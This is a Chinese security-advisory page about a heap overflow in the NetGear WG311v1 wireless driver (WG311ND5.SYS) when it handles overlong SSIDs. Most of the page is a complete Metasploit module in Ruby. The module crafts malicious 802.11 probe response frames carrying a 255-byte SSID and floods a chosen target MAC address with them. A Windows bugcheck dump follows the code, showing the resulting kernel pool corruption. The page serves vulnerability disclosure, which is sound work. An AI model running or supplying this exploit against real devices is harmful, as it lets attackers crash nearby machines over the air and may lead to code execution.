首页 -> 安全研究

安全研究

安全漏洞
NetGear WG311v1无线驱动超长SSID堆溢出漏洞

发布日期:2006-11-22
更新日期:2006-11-24

受影响系统:
Netgear WG311ND5.SYS 2.3.1.10
描述:
BUGTRAQ  ID: 21251

WG311是一款54M的无线PCI网卡。

WG311v1无线驱动在处理超长的SSID时存在堆溢出漏洞,远程攻击者可以通过发送特制报文来触发这个漏洞,可能导致拒绝服务或执行任意指令。

问题存在于WG311ND5.SYS驱动中,在Windows系统上重现,但Linux及FreeBSD也可能受类似漏洞的影响。

<*来源:Laurent Butti (laurent.butti@orange-ftgroup.com
  
  链接:http://secunia.com/advisories/23051/
        http://projects.info-pull.com/mokb/MOKB-22-11-2006.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

require 'msf/core'

module Msf

class Auxiliary::Dos::Wireless::Netgear_WG311_SSID < Msf::Auxiliary

    include Exploit::Lorcon

    def initialize(info = {})
        super(update_info(info,    
            'Name'           => 'NetGear WG311v1 Wireless Driver Long SSID Overflow',
            'Description'    => %q{
                This module exploits a buffer overflow in the NetGear WG311v1 wireless device
                driver under Windows XP and 2000. A kernel-mode heap overflow occurs
                when malformed probe response frame is received that contains a long SSID field
                
                This DoS was tested with version 2.3.1.10 of the WG311ND5.SYS driver and a
                NetGear WG311v1 PCI card. A remote code execution module is also in development.

                This module depends on the Lorcon library and only works on the Linux platform
                with a supported wireless card. Please see the Ruby Lorcon documentation
                (external/ruby-lorcon/README) for more information.
                
            },
            
            'Author'         => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module
            'License'        => MSF_LICENSE,
            'References'     =>
                [
                    ['URL', 'http://projects.info-pull.com/mokb/MOKB-22-11-2006.html'],                
                    ['URL', 'ftp://downloads.netgear.com/files/wg311_1_3.zip'],
                ]
        ))
        register_options(
            [
                OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]),
                OptString.new('ADDR_DST', [ true,  "The MAC address of the target system"])
            ], self.class)                    
    end

    def run

        open_wifi

        stime = Time.now.to_i
        rtime = datastore['RUNTIME'].to_i
        count = 0

        print_status("Creating malicious probe response frame...")

        frame = create_probe_response()

        print_status("Sending malicious probe response frames for #{datastore['RUNTIME']} seconds...")

        while (stime + rtime > Time.now.to_i)
            wifi.write(frame)
            select(nil, nil, nil, 0.10) if (count % 100 == 0)
            count += 1
        end

        print_status("Completed sending #{count} probe responses.")
    end

    def create_probe_response
        bssid    = Rex::Text.rand_text(6)
        seq      = [rand(255)].pack('n')
        
        frame =
            "\x50" +                      # type/subtype
            "\x00" +                      # flags
            "\x00\x00" +                  # duration  
            eton(datastore['ADDR_DST']) + # dst
            bssid +                       # src
            bssid +                       # bssid
            seq   +                       # seq  
            Rex::Text.rand_text(8) +      # timestamp value
            "\x64\x00" +                   # beacon interval
            "\x01\x00" +                  # capabilities

            # SSID IE overflow
            "\x00" + "\xff" + ("\x41" * 255) +

            # supported rates IE
            "\x01" + "\x08" + "\x02\x04\x0b\x16\x0c\x18\x30\x48" +

            # channel IE
            "\x03" + "\x01" + channel.chr
        
        return frame

    end    
end
end

=begin
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

BAD_POOL_HEADER (19)
The pool is already corrupt at the time of the current request.
This may or may not be due to the caller.
The internal pool links must be walked to figure out a possible cause of
the problem, and then special pool applied to the suspect tags or the driver
verifier to a suspect driver.
Arguments:
Arg1: 00000020, a pool block header size is corrupt.
Arg2: 81cae7b0, The pool entry we were looking for within the page.
Arg3: 81cae8c8, The next pool entry.
Arg4: 0a23002b, (reserved)
=end

建议:
厂商补丁:

Netgear
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.netgear.com/

浏览次数:3079
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障